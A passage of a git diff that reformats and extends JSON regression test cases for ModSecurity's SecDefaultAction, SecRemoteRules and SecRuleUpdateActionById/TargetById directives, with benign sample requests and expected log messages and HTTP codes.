"SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"t:none,phase:2,id:1,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", @@ -118,14 +122,41 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: t:none", - "expected":{ - "parser_error":"The transformation none is not suitable to be part of the SecDefaultActions" - }, - "rules":[ + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: t:none", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "The transformation none is not suitable to be part of the SecDefaultActions" + }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,t:none\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"t:none,phase:2,id:1,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", @@ -133,58 +164,60 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: simple test", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: simple test", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test, text\/html,application", - "error_log":"" + "expected": { + "debug_log": "Saving msg: This is a test, text/html,application", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,log,auditlog,pass\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", @@ -192,30 +225,83 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: action not suitable", - "expected":{ - "parser_error":"The action 'id' is not suitable to be part of the SecDefaultActions" - }, - "rules":[ + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: action not suitable", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "The action 'id' is not suitable to be part of the SecDefaultActions" + }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,id:1,log,auditlog,pass,tag:'teste'\"", - "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,tag:'teste',t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: twice", - "expected":{ - "parser_error":"SecDefaultActions can only be placed once per phase and configuration context. Phase 2 was informed already." - }, - "rules":[ + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: twice", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "SecDefaultActions can only be placed once per phase and configuration context. Phase 2 was informed already." + }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,log,auditlog,pass,tag:'teste'\"", "SecDefaultAction \"phase:2,log,auditlog,pass,tag:'teste'\"", @@ -224,58 +310,60 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: status + redirect", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: status + redirect", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Request was relevant to be saved.", + "expected": { + "debug_log": "Request was relevant to be saved.", "http_code": 302 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,log,auditlog,status:302,redirect:'http://www.google.com'\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"phase:2,id:1,block\"", diff --git a/test/test-cases/regression/config-secremoterules.json b/test/test-cases/regression/config-secremoterules.json index 5065e06b64..9ff647afe3 100644 --- a/test/test-cases/regression/config-secremoterules.json +++ b/test/test-cases/regression/config-secremoterules.json @@ -1,95 +1,134 @@ [ { - "enabled":1, - "version_min":300000, + "enabled": 1, + "version_min": 300000, + "title": "Include remote rules", "resource": "curl", - "title":"Include remote rules", - "client":{ - "ip":"200.249.12.31", - "port":123 + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"PmFromFile\" with param \".*\" against REQUEST_FILENAME" + "expected": { + "debug_log": "Executing operator \"PmFromFile\" with param \".*\" against REQUEST_FILENAME", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRemoteRules key https://raw.githubusercontent.com/owasp-modsecurity/ModSecurity/refs/heads/v3/master/test/modsecurity-regression-rules.txt", "SecRule ARGS \"@contains somethingelse\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, + "enabled": 1, + "version_min": 300000, + "title": "Include remote rules - failed download (Abort)", "resource": "curl", - "version_min":300000, - "title":"Include remote rules - failed download (Abort)", - "expected":{ + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Failed to download" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRemoteRulesFailAction Abort", "SecRemoteRules key https://gist.githubusercontent.com/zimmerle/a4c1ec028999f7df71d0cc80f4f271ca/raw/4c74363bf4eae974180f1a82007196e58729dd16/modsecurity-regression-test-secremoterules-bonga.txt" ] }, { - "enabled":1, + "enabled": 1, + "version_min": 300000, + "title": "Include remote rules - failed download (Warn)", "resource": "curl", - "version_min":300000, - "title":"Include remote rules - failed download (Warn)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"somethingelse\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"somethingelse\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRemoteRulesFailAction Warn", "SecRemoteRules key https://gist.githubusercontent.com/zimmerle/a4c1ec028999f7df71d0cc80f4f271ca/raw/4c74363bf4eae974180f1a82007196e58729dd16/modsecurity-regression-test-secremoterules-bonga.txt", diff --git a/test/test-cases/regression/config-update-action-by-id.json b/test/test-cases/regression/config-update-action-by-id.json index 4e1a3fc24e..a960eb2916 100644 --- a/test/test-cases/regression/config-update-action-by-id.json +++ b/test/test-cases/regression/config-update-action-by-id.json @@ -1,272 +1,294 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (1/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (1/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 200, - "debug_log": "Skipped rule id '200005'" + "expected": { + "debug_log": "Skipped rule id '200005'", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"allow\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"allow\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (2/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (2/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (3/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (3/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 200, - "debug_log": "Running action: log" + "expected": { + "debug_log": "Running action: log", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"pass\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"pass\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (4/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (4/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 200, - "debug_log": "Running action: log" + "expected": { + "debug_log": "Running action: log", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"pass\"", - "SecDefaultAction \"phase:3,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"pass\"", + "SecDefaultAction \"phase:3,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (5/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (5/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 200, - "debug_log": "Dropping the evaluation of upcoming rules in favor of" + "expected": { + "debug_log": "Dropping the evaluation of upcoming rules in favor of", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"allow\"", - "SecDefaultAction \"phase:3,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"allow\"", + "SecDefaultAction \"phase:3,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (6/n)", - "issue":"2005", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (6/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 302, - "error_log": "Access denied with code 302" + "expected": { + "error_log": "Access denied with code 302", + "http_code": 302 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"redirect:'https://%{request_headers.host}/'\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"redirect:'https://%{request_headers.host}/'\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block,deny\"" ] } ] - diff --git a/test/test-cases/regression/config-update-target-by-id.json b/test/test-cases/regression/config-update-target-by-id.json index 8faecaefe6..a8bc0ea05a 100644 --- a/test/test-cases/regression/config-update-target-by-id.json +++ b/test/test-cases/regression/config-update-target-by-id.json @@ -1,199 +1,224 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude whole collection", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude whole collection", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 !ARGS", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude using regex", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude using regex", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?mixpanel=value&mixpanel=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?mixpanel=value&mixpanel=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 !ARGS:/mixpanel$/", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude using full name", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude using full name", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?mixpanel=value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?mixpanel=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 !ARGS:mixpanel", "SecRule ARGS \"@contains value\" \"id:1,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (match)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 